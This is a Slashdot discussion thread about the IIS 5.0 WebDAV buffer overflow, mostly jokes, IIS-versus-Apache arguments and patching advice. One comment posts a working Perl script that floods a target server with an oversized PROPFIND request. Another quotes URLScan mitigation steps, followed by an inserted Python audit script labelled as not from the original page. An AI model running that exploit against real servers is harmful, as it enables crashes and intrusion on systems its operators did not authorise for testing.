WebDAV Buffer Overflow Attack Compromises IIS 5.0
rf0 writes "Well CERT is reporting a new overflow attack for IIS 5.0. Microsoft has released a bulletin. Better download those patches and fix another security hole." According to this CNET story, Microsoft says that this is already being exploited, at the very least since last Wednesday.
yup (Score:4, Funny)
Re:yup (Score:4, Funny)
-Charlie
(This was originally meant to be sarcasm, but then I went to the windows update and looked at the entire patch list, not the rollups. It really is as bad as I was thinking. As that great philosopher Pepe LaPew says, *LeSigh*.)
Re:yup (Score:4, Funny)
Was that really +5 funny?
I've never had mod points.
Those of us who get mod points weekly are easily amused. Try clicking on the "willing to moderate" box. :)
Patch? (Score:4, Funny)
Well duh, "patch my IIS", it's monday isn't it?
Re:Patch? (Score:5, Funny)
Re:Patch? (Score:2, Funny)
Thursday, Tuesday, Today, Tomorrow.
Re:Patch? (Score:2, Funny)
Ugh (Score:5, Informative)
Comment removed (Score:5, Informative)
Re:Ugh (Score:3, Insightful)
Four things that make WebDav's so
cool
And don't forget to add
WebDAV like SOAP makes it real easy
for developers to sneak your data
thru pesky firewalls using Port 80.
That-a-Way, we can all share all our
Corp Documents with the WFW ( Whole
Effing World )
-- kjh
Re:It's clear that you don't understand security.. (Score:4, Informative)
No, it is clear that *you* don't understand security. Specifically:
Please, get a clue.
/mike
Re:It's clear that you don't understand security.. (Score:3, Informative)
A VPN has end to end encryption that is what makes it secure. Does WebDAV have end to end encryption?
* "using any number of authentication schemes" does not "lock down" anything at all.
If your security depends on authentication schemes you are hosed. You have to have authentication but you also have to have a whole slew of other measures. Which WebDAV does not.
* It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for f
Re:It's clear that you don't understand security.. (Score:5, Informative)
- WebDAV is *nothing* like a VPN.
A VPN provides secure access to a remote network via one or more untrusted networks, typically the Internet. Once a VPN is established, the local endpoint has access to the remote network's resources including, but not limited to, file, mail, directory, print and web servers. Existing protocols such as IMAP, POP, HTTP, LDAP, NFS and SMB can be used over the VPN in a mostly secure and transparent manner.
WebDAV is an extension to HTTP - The Hypertext Transport Protocol. HTTP is designed to transport hypertext (hence its name) and other media via TCP. WebDAV provides distributed authoring and publishing extensions to HTTP to allow, amongst other things, remote collaboration. Using WebDAV for a network file system is akin to using FTP for the same. It is a bad idea.
=> WebDAV is nothing like a VPN.
- "using any number of authentication schemes" does not "lock down" anything at all.
- It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for filesharing. Just like using SOAP over HTTP(S).
Doing everything via HTTP, whether running plain text over port 80, encrypted over port 443 or any other combination is bad practice. One of SOAP's (and WebDAV's) "features" is that it allows you to do stuff over HTTP that would usually otherwise be blocked by a firewall. Want to do RPC? Sure! Just tunnel it through port 80! Want to do file sharing? Sure! Just tunnel it through port 80! This is seriously screwed up. It defeats a primary purpose for which firewalls were invented in the first place; to limit access to dangerous services. Not to mention that using HTTP for everything is a serious architectural design flaw as well.
Putting authentication in front of HTTP and/or tunneling it over SSL does not fix these problems. This IIS exploit du-jour is a perfect example of such.
- Web applications are irrelevant to network security.
A web application should be well designed and implemented, with security in mind. It should be deployed on a network which is properly secured. It should be running on systems which are properly secured. Making a web application secure does not make a network secure (and vice versa). "Irrelevant" is probably too strong a word, but the security of a network should never be dependent on the security of a web application.
/mike
Re:If it were that easy... (Score:2)
Have you tried it with a professionally developed WebDAV server? Get yourself a free account at http://www.sharemation.com and give it a try. You can even write to support@xythos.com if it doesn't work for you (NOTE: it has always worked for me).
Re:Ugh (Score:3, Informative)
Read the links in the posting:
Microsoft Windows 2000 supports the World Wide Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV, defined in RFC 2518, is a set of extensions to the Hyper Text Transfer Protocol (HTTP) that provide a standard for editing and file management between computers on the Internet. A security vulnerability is present in a Windows component used by WebDAV, and results because the component contains an
Re:Ugh (Score:5, Interesting)
Re:Ugh (Score:5, Informative)
HTH
Re:Ugh (Score:3, Insightful)
Sounds like yet another result of not having a completely well defined API and/or not adhering to it...
Anything between the big-bad-internet and operating system internals should check all parameter values and data it passes on to the OS.
Basically, there could be another bug in another dll of windows that WebDAV may someday call, and the same security hole is open again. Especially worr
Another day, another Microsoft bug (Score:4, Funny)
Bah, the Internet (Score:5, Funny)
Re:Bah, the Internet (Score:2)
But there is green beer to be drank, and those 31337 0day haq0rs have had this in their hands for a while...
Re:Bah, the Internet (Score:5, Funny)
Shut the
=D
Re:Bah, the Internet (Score:3, Funny)
dotdash dashdash
dotdash dotdashdotdot dotdashdot dot dotdash dashdotdot dashdotdashdash
dash dotdotdotdot dot dotdashdot dot
dotdashdotdashdotdash
Re:Bah, the Internet (Score:3, Funny)
Re:Bah, the Internet (Score:3, Funny)
You think internet DDoS attacks are bad, just wait until you have 10,000 Pigeons flying straight for you!
Again... (Score:3, Interesting)
Re:Again... (Score:5, Funny)
>change allowed to take over the system?
Because it is "trusted".
Re:Again... (Score:3, Insightful)
Gartner Group (Score:5, Insightful)
If you didn't, well, get with the program!
Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it.
Re:Gartner Group (Score:2, Interesting)
I remember many moons ago, there was a program that could convert ASP to PHP - I wonder if it still exists and how good it is these days if so..?
Re:Gartner Group (Score:5, Informative)
Are you talking about ASP2PHP over at asp2php.naken.cc [naken.cc]? The biggest things it doesn't seem to support are COM objects and MS SQL Server connections, at least according to the FAQ [naken.cc].
Go Mono! - Re:Gartner Group (Score:2, Interesting)
Why wait for Microsoft when ASP.Net is already being ported [go-mono.com]?
Re:Gartner Group (Score:3, Informative)
http://www.microsoft.com/downloads/detail
Why use IIS? (Score:2, Insightful)
Re:Why use IIS? (Score:3, Flamebait)
Re:Why use IIS? (Score:2)
I'd send them a list of both, along with a list of patch availability time for each hole that was patched, and a list of holes that still remain unpatched.
Frankly, the thing that steams my giblets the most about IIS is the unalterable GMT time-stamping on the W3C log format coupled with the inability to customize the other available (non-GMT stamping) log forma
Apache security alerts? (Score:5, Insightful)
All seven of them? All long fixed? Page not updated since January 23, 2003? I'd LOVE to send them that. Comparing that to the long and varied string of IIS compromises/failures/destruction would be enough to get even the pointiest headed boss to make the switch. Good idea. Thanks!
Re:Apache security alerts? (Score:3, Interesting)
Not only are they older, they almost all have one thing in common: they are for apache on Win32.
Only one or two of the seven affected a UNIX platformed apache.
It seems that the vulns for Win32 revolve around getting the '/' vs '\' right and how they do their path checking.
Re:Why use IIS? (Score:5, Insightful)
A text file can hide options too, but not in the same way. Generally, applications have many defaults that don't need to be defined in the configuration explicitly. A good config file will list most of these anyway, even if commented out (example
That being said, there is no reason that someone putting a server on the internet should be afraid of editing a text file. Even in Windows! Notepad is just fine...
If you're playing on the public internet, you have to put up or shut up (know your shit, or accept the consequences)...
Obviously though, this issue has nothing to do with the WebDAV exploit. Even the best admin is at the mercy of the quality of his/her software (whether UNIX or Windows or $your_os).
-Ben
OMG! (Score:4, Funny)
Re:OMG! (Score:5, Funny)
Re:OMG! (Score:2)
If it was static (in the C sense), an overflow wouldn't smash the stack and there would be no exploit. ;-)
Re:OMG! (Score:3, Informative)
Hi everybody! (Score:4, Insightful)
Re:Hi everybody! (Score:2)
I am kind of impressed (Score:5, Interesting)
Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendency to run unpatched machines.
Re:I am kind of impressed (Score:3, Interesting)
Many of these unpatched boxes are even windows machines.
(No, I'm not slamming windows, or *n?x; but bad admin practices.)
Don't be! (Score:5, Insightful)
Slight problem with that (Score:5, Interesting)
-Charlie
Re:I am kind of impressed (Score:5, Insightful)
MSNBC Posted this article... (Score:5, Informative)
Re:MSNBC Posted this article... (Score:2, Insightful)
"IT'S UNKNOWN WHAT Army computer was attacked, how significant a target it was, or what the intruder's intentions were."
Who said it was a critical system? Critical systems weren't even connected to the internet where I was. Or it could be an inside job?
Re:MSNBC Posted this article... (Score:3, Informative)
I'd uninstall it but... (Score:5, Funny)
Re:I'd uninstall it but... (Score:2)
Q: WebDAV is Real? (Score:3, Interesting)
So is this any kind of standard WebDAV [webdav.org] or just a particular proprietary implementation of similar features in IIS?
I've always been curious about this technology. At one point I even heard talk of a "WebDAV filesystem", but haven't heard of it taking off in any big way yet.
Re:Q: WebDAV is Real? (Score:5, Informative)
If you just want a DAV filesystem, see mod_dav_fs in any recent Apache. (Which DOES run on Windows, for everyone who wants to toss the OS out with the webserver. Not that I'm a fan of Windows for anything, but you can run non-MS servers on the thing.)
A quite-interesting report on MSNBC (Score:4, Interesting)
It seems quite likely to me that that was an under-reported version of this incident [msnbc.com] reported on MSNBC, that permitted an intruder with apparent quite-hostile intent onto US Army sites.
It's a bug...so what? (Score:4, Insightful)
Now, I'm no anti-any OS, I like them all, but what about the latest Sendmail vuln? Or even the one in older versions of BIND? Isn't it true to say that ALL OSes are equally as vulnerable? During the brief time I was on the Redhat Network, I got at least two or three updates a day telling me the sky was about to fall in if I didn't patch my server soon.
I treat all servers fairly, regardless of background, age or reliability :-)
Imagine an equivalent (Score:5, Informative)
The best way to evaluate this bug is to consider an equivalent attack against competitors. In this case, the main competitor is Apache.
Cracking Apache in this way would not give you root. While you might be able to get root by using some other local exploit, it's not the slam-dunk that it is on Windows.
Furthermore, careful admins can run Apache in a sandbox called a "chroot". Properly set up, this means that the attacker can't get to the rest of the system; all they can play with is the Web site.
So, in summary:
It's all Microsoft's fault. It's crap software.
That's a pretty good assessment. The bug itself is a mistake lots of other people have made, but the severity of the mistake isn't.
Re:Nope (Score:3, Insightful)
Perhaps, but IIS runs within kernel space, which is why a remote exploit is always a big deal. Apache may be a bit slower, but runs in user space and thus a remote exploit is less dangerous. So you're right, all OSes/apps aren't equally as vulnerable, but IIS is pretty fucking vulnerable.
Re:Nope (Score:2, Informative)
Re:Nope (Score:3, Interesting)
Granted, I've more experience with Apache than IIS, so if my post was in error it's certainly understandable. That was my understanding from previous IIS vs. Apache tests, was that part of IIS ran in kernel mode to serve pages faster, and that was one reason many remote exploits were so serious.
Regardless, we have 2 IIS servers here at work, that are accessible to the Internet, and that has never been a problem. We keep them up to date, run the lockdown tool, so on. It really isn'
CERT can save money... (Score:4, Funny)
Exploited (Score:2)
That could count as a really big argument against not disclosing vulnerabilities as soon as possible? I don't know since when Microsoft is aware of this and making the patch, but if it have time to be developed an exploit
Re:Exploited (Score:2)
did anyone read the microsoft bulletin... (Score:5, Insightful)
Why would you run an IIS server without using the lockdown utility??
We (large corporation) have been using IIS servers and without a problem. With Lockdown/urlscan there are no problems at all. The logs show people trying to get in but being rejected.
I think this story is a bit overblown. It appears that most
cheers
John
Sorry for feeding the trolls, but (Score:4, Insightful)
Your first three paragraphs were quite good and interesting.
Your fourth is full of idiocy.
I think this story is a bit overblown. Umm, not at all. It is quite a serious incident.
It appears that most /.'s don't like microsoft
Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?
and that's sad because microsoft is the driving company behind many many jobs
They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.
They drive their own jobs with lots of marketing and billions to spend on research, which would be much better used in a large market of competing thriving software vendors, like we had before Microsoft used monopolistic business models to destroy them all. If you become successful, Microsoft is guaranteed to take it away from you. That is successful for Microsoft and creation of Microsoft jobs, but far from good for America or the world.
The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.
You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.
But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?
Re:did anyone read the microsoft bulletin... (Score:2)
Uhm, you do realize that this is Slashdot, right? Of course you do... you cite
You are right though, Microsoft products can be secure. Just like Linux products can be insecure. The difference is in the default.
Re:did anyone read the microsoft bulletin... (Score:2, Insightful)
Yeah, that's why the stock everyone was talking about in 1995 was netscape communications corp. The WEB was the last boom. No questions about that.
Re:did anyone read the microsoft bulletin... (Score:2)
The PC boom was dependent on the web/internet boom. Any OS can run a browser, it just happened that Microsoft was the de facto standard on the PC platform at the time.
If you want to thank anyone for ushering the information age you can start with UIUC's NCSA and Tim Berners-Lee.
Re:did anyone read the microsoft bulletin... (Score:2)
Re:did anyone read the microsoft bulletin... (Score:3, Interesting)
Why would you run an IIS server without using the lockdown utility??
Good point. However, my company advises our clients against running it, mainly because their sysadmins are...not well versed in the arts of running a windows web server. The default configuration for the lockdown tool shuts down everything except for HTML. That includes the ASP engine, which our product requires. If the sysadmin spends a few minutes to go through the list of what to disable and what not to, they're fine.
Sadly, our c
What aspects of URLScan provide protection (Score:4, Interesting)
The MS advisory states that a 'default' URLScan will protect against this. Well
Anyone know?
Re:What aspects of URLScan provide protection (Score:5, Informative)
Quote:
Just to clarify, Microsoft's bulletin states that this vulnerability
could have been prevented using URLScan and/or IISLockdown, but it
isn't really specific on how to do this. Several people have asked me
how this can be done.
The following steps can be used to block the attack:
1. Completely disable WebDAV by setting the
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC
registry key to 1
2. Limit the length of requests (the url and any headers) by setting
the HKLM\SYSTEM\CurrentControlSet\Services\w3svc\para
MaxClientRequestBuffer to something like 16k
3. Block the following WebDAV HTTP verbs using URLScan (either by
specifically blocking them or by not listing them as allowed):
OPTIONS, PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK,
UNLOCK, OPTIONS, and SEARCH. Note that FrontPage does require the
OPTIONS method to work properly.
4. Block the following WebDAV-related headers using the [DenyHeaders]
section of URLScan.ini:
[DenyHeaders]
DAV:
Depth:
Destin
If:
Label:
Lock-Token:
Overwrite:
Time
TimeType:
DAVTimeOutVal:
Other:
5. If you require WebDAV, you can limit the
length of each individual header with these entries in the
[RequestLimits] section (The exact values are obviously pretty
generic and may need to be increased or decreased based on your
particular configuration):
[RequestLimits]
Max-DAV=250
Ma
Max-Destination=250
Max-If=250
Max-
Max-Lock-Token=250
Max-Overwrite=250
Max-TimeType=250
Max-DAVTimeOutV
Max-Other=250
Microsoft does not specifically state which HTTP Verb and/or header
is affected, but it does say that it is related to WebDAV. I would
therefore assume that setting ACLs on httpext.dll would still be
effective in blocking the attack. The PUT and DELETE methods are
still available in IIS, but only as part of the original HTTP spec,
not part of WebDAV.
Mark Burnett
www.iissecurity.info
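A way to check a URLScan.ini against steps 3 to 5 of the quoted message, as an added example that is not part of Mark Burnett's post or any Microsoft tool. The function names and sample configurations are hypothetical; `UseAllowVerbs`, `[AllowVerbs]` and `[DenyVerbs]` are URLScan's own settings, and header names the page shows truncated are left out rather than guessed.

```python
# Added example: audits URLScan.ini text against the verb/header steps quoted
# above. Verb and header names are the ones legible in the quoted post.

WEBDAV_VERBS = ("OPTIONS", "PROPFIND", "PROPPATCH", "MKCOL", "DELETE", "PUT",
                "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH")
WEBDAV_HEADERS = ("DAV", "Depth", "Destination", "If", "Label", "Lock-Token",
                  "Overwrite", "TimeType", "DAVTimeOutVal", "Other")


def parse_urlscan_ini(text):
    """Return {section_name_lower: [entry, ...]}; ';' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def key_values(entries):
    """Turn 'Key=Value' entries into a dict with lower-cased keys."""
    pairs = (e.partition("=") for e in entries)
    return {k.strip().lower(): v.strip() for k, sep, v in pairs if sep}


def audit(text, webdav_required=False, allow_options=False, max_len=250):
    """List the gaps between a URLScan.ini and the quoted steps 3-5."""
    sections = parse_urlscan_ini(text)
    findings = []
    if webdav_required:
        # Step 5: WebDAV stays on, so every DAV header needs a length cap.
        limits = key_values(sections.get("requestlimits", []))
        for header in WEBDAV_HEADERS:
            value = limits.get("max-" + header.lower())
            if value is None or not value.isdigit():
                findings.append(f"no Max-{header} limit in [RequestLimits]")
            elif int(value) > max_len:
                findings.append(f"Max-{header}={value} exceeds {max_len}")
        return findings

    # Step 3: verbs are blocked either by a deny list or by an allow list
    # that does not mention them, depending on UseAllowVerbs.
    mode = key_values(sections.get("options", [])).get("useallowverbs")
    allowed = {v.upper() for v in sections.get("allowverbs", [])}
    denied = {v.upper() for v in sections.get("denyverbs", [])}
    if mode not in ("0", "1"):
        findings.append("UseAllowVerbs is not 0 or 1; verb filter mode unknown")
    for verb in WEBDAV_VERBS:
        if verb == "OPTIONS" and allow_options:  # FrontPage needs OPTIONS
            continue
        if mode == "1" and verb in allowed:
            findings.append(f"{verb} is listed in [AllowVerbs]")
        elif mode == "0" and verb not in denied:
            findings.append(f"{verb} is missing from [DenyVerbs]")

    # Step 4: each WebDAV header should appear in [DenyHeaders].
    deny_headers = {h.rstrip(":").strip().lower()
                    for h in sections.get("denyheaders", [])}
    for header in WEBDAV_HEADERS:
        if header.lower() not in deny_headers:
            findings.append(f"{header}: is missing from [DenyHeaders]")
    return findings


# Constructed sample configurations (not taken from any real server).
WEAK_INI = """\
[options]
UseAllowVerbs=0      ; deny-list mode, but only one verb is denied
[DenyVerbs]
PROPFIND
[DenyHeaders]
Translate:
"""

HARDENED_INI = (
    "[options]\nUseAllowVerbs=1\n[AllowVerbs]\nGET\nHEAD\nPOST\n[DenyHeaders]\n"
    + "".join(h + ":\n" for h in WEBDAV_HEADERS)
)

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini) or "OK")
```

Pass `allow_options=True` for servers that need FrontPage, and `webdav_required=True` to check the per-header length caps of step 5 instead of the blocks in steps 3 and 4.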
Exploited! (Score:5, Funny)
And I thought that Penguin on the Microsoft home page looked a little out of place.
timely patches (Score:2, Interesting)
I'm not bashing either side because *nix has its security issues, too; but last time I saw an exploit with Linux, there was a patch well before any known exploits. I'm not saying the patches to Linux were made before the bug was made public, just that they were available before the bug was exploited.
If there is some cracker out there that has found this bug,
Glad to see they noticed it (Score:2, Interesting)
Why, you may ask, would it be good for one of Apache's competitors to be less buggy (assuming you are arguing from a pro-open source standpoint)? This gives Apache competition. The more competition it has, the more incentive many of its developers will have to improve it.
Wouldn't it just be simpler if slashdot... (Score:3, Funny)
National Security (Score:5, Funny)
In a future near you...
By order of John Ashcroft, Dick Cheney, and Bill Gates, Windows bugs are now a matter of national security. All discussion in this thread is to stop immediately!
---
Seriously, with the Army getting hacked and the continued insistence of elements of the govt and military to use Windows, soon bugs and exploits will be classified as state secrets and we'll stop hearing about them. Soon enough vested FBI agents will be knocking on the door of anyone who opens their mouth...excuse me, someone's at the door...
=======rrrrtwjstoah;!!!!!!!!!
I wonder if it's related to this intrusion.. (Score:4, Insightful)
This is perfect! (Score:2, Funny)
I just ran into a problem today on one of our development web servers, trying to get an ASP to run a windows shell script with particular permissions. Anyway, executing arbitrary code in the Local System Context -- this is just the feature that I've been looking for!
Quite handy solution (Score:5, Informative)
Doesn't help at all (example) (Score:4, Interesting)
Take a look at the World Health Organization South-East Asia web site:
http://w3.whosea.org/index.htm
They're running IIS 4.0. FOUR.POINT.ZERO.
The deface has been there for almost a day with apparently no fix yet
Re:Doesn't help at all (example) (Score:5, Insightful)
I don't agree with that. Microsoft itself can't keep up with the patch schedules; its servers regularly get hacked. Who has more resources than Microsoft? Nobody.
The fact is that if you are running a mission critical server you must test before deploying a patch. That takes time and money that the IT group has in short supply these days.
Then there is the issue of Microsoft's marketing - they sell IIS as the easy to use 'zero maintenance' lowest TCO choice. False advertising in this case.
Windows Update (Score:3, Informative)
Editorial bias? (Score:5, Insightful)
What I do find interesting is that
I'm not griping about having my story rejected, I've had many rejected and a few accepted, and that's the way things are, no problem. What I am questioning is the editorial bias. Here we are at a website which probably has one of the highest concentration of Opera users of any website in the world, and they chose to not post a negative story about "the good guys" (which has exploits in the wild) but did choose to post a negative story about "the bad guys".
Just more of
In Related News.... (Score:3, Insightful)
Thanks guys! (Score:3, Interesting)
So, Danke!
Exploit Code (Karma Whoring) (Score:3, Informative)
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
print "IIS 5.0 propfind\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname
# ^^^^ This is another issue and also works with length ~>65000
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}
do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";
Re:This is news? (Score:5, Funny)
Re:This is news? (Score:2, Insightful)
I have nothing against software licenses...Sometimes their implementation is questionable, and more often than not taken for granted by the majority of users, but I see them as a valid way for the writer of the software to place restrictions on its use.
I can, and do, license my stuff under the GPL, LGPL, or BSD license, as the case warrants.
Re:Windows XP? (Score:4, Informative)
Re:OK, so how about (Score:2)
Similar Apache bugs have received 'front page' billing, which is appropriate.
Re:OK, so how about (Score:4, Insightful)
The sendmail security issue certainly did make the front page.
The fact is that the Samba problem is unlikely to be exploitable remotely because Samba is generally not exposed to the Internet. In the case of the MySQL issue, it requires a man-in-the-middle attack to pull off arbitrary code execution. Many protocols are vulnerable to this sort of attack - it is also a type of attack that is very hard to pull off.
Moderators => please mod parent down. The guy is a jackass.
Re:OK, so how about (Score:2)
I'm not talking about the technical niceties of the vulnerabilities or why some are worse than others.
Comment removed (Score:5, Insightful)
Re:There are UNEXPLOITABLE web servers - MacOS ! (Score:4, Interesting)
I am feeding trolls today.
Exploits would be related to the percentage of the web actually using the platform, the number of expansive web software systems available for the platform (if you run Apache, for example, all the same exploits would apply, etc.).
No command shell... My toaster has no command shell, either, and it has never been hacked, so it must be right. Of course, it might be a function of how many useful things you can do with it.
No Root user... What a novel concept. I get it, just throw away all the security model, and then the problems don't qualify as security problems anyway. Pesky security mechanisms were just distracting us. Real climbers never use safety ropes, because they just get in the way and cause a false sense of security!
Pascal strings... I have certainly spent many years working with non-null-terminated strings that used a count. It is irrelevant to buffer overflows whether the size is by delimiter or by pre-count. It is a matter of whether the program (or automatic string class) checks to see if the static buffer has room for the new string based upon the sizes of the source strings. I have seen plenty of buffer overflows with counted strings for exactly the same reasons they occur in null-terminated strings.
Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed"...Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! That explains why Macs were not vulnerable to the Word Macro exploits and a variety of other exploits -- oops, they were. Then, perhaps it is just a matter of how popular a platform it is. Let's see, no interesting modern Web Server configurations run on it, so no one uses it, and no one exploits it. A little like my daughter's TI-83, no web exploits against that, either, but it does not support the types of web applications I want or a reasonable number of users. But no one would bother to write an exploit for it!
this troll again! (Score:5, Informative)
This post is a lot like the "BSD is dying" troll that's just not going away. Every once in a while some idiot posts it, and a few other idiots moderate it up. Anyway, on to debunking.
The MacOS running WebStar and other webservers as has never been exploited or defaced, and are unbreakable based on historical evidence.
Really? Is that because it crashed every time someone tried to access it? Considering that MacOS does not even have preemptive multitasking or proper memory protection, it's not that hard to imagine. MacOS has a really nice GUI, but in terms of technology it is behind even Windows 95.
In fact in the entire SecurityFocus (BugTraq) database history there has never been a Mac exploited over the internet remotely.
Hmmm, there are no exploits for DOS either. Are we to conclude that DOS is the most secure OS ever?
No command shell...
BFD! If you gain control of a process (through buffer overflow, for example) and manage to execute your own code, you still have complete control of the system. Heck, the current bug in IIS has nothing to do with exploiting shell.
No Root user.
The troll is only getting better. Ladies and gentlemen, it has come to our attention that the competitors' cars have malfunctioning seatbelts and thus cause injuries to passengers in a collision. Our MacCar has no seatbelts, therefore it is not vulnerable to collisions.
You know, IIS also runs as root (or rather LocalSystem in NT terms). By always running as root there is no false sense of security and programming is done carefully. Doesn't seem to help though...
Pascal strings.... As you know Pascal strings (length prefixed) are faster than C...but the side effect is less buffer exploits
...and they are limited to 255 bytes in length. (For those who did not program in pascal, the first character in the char array represents the length of the string. Since unsigned char's maximum value is 255, that's the maximum length of the string). Anyway, a buffer overflow occurs when you try to write more data than you can fit in the buffer. The only way a compiler could prevent that is if it inserts length checks before every write, and either truncates the string or terminates the program. It's been a loooong time since I touched pascal, so I don't remember how it handles that, but in any case it's irrelevant: is WebStar written in Pascal? In fact, besides some legacy code in MacOS, is anything at all written in Pascal these days?
Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension).
Unix running Apache have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension). (You can't run some random data).
Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing!
Unix never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! (You need to set executable permission first).
but the best part is that mac web programs and server tools do not create files with resource forks usually. TOTAL security.
Yeah, and when I leave the house I put my keys under the rug usually. TOTAL security. I mean who would possibly figure out how to create "resource forks" and such?
Stack return address positioned in safer location than some intel Osses.
That is the property of the hardware, not OS. Do you understand the distinction?
7> There are less macs, though there are huge cash prizes for cracking into a MacOS based WebStar server (typically over $10,000 US). Less macs means less hacker interest
What happened to 5> and 6>? Were those arguments too stupid even by your standards?
Anyway, in this paragraph you are contradicting yourself: on the one hand you are claiming that macs are safer because there is less
Yes, indeed... (Score:4, Interesting)
I wrote an FTP server in SML (http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/t
Of course, any language that lets you write interesting programs (ie, "telnetd") will also let you write programs with security holes. (In a sense, telnetd is itself a security hole, provided you have the password!) But having the compiler automatically ensure that the largest class is impossible gives you a lot more time to work on other, more subtle security problems.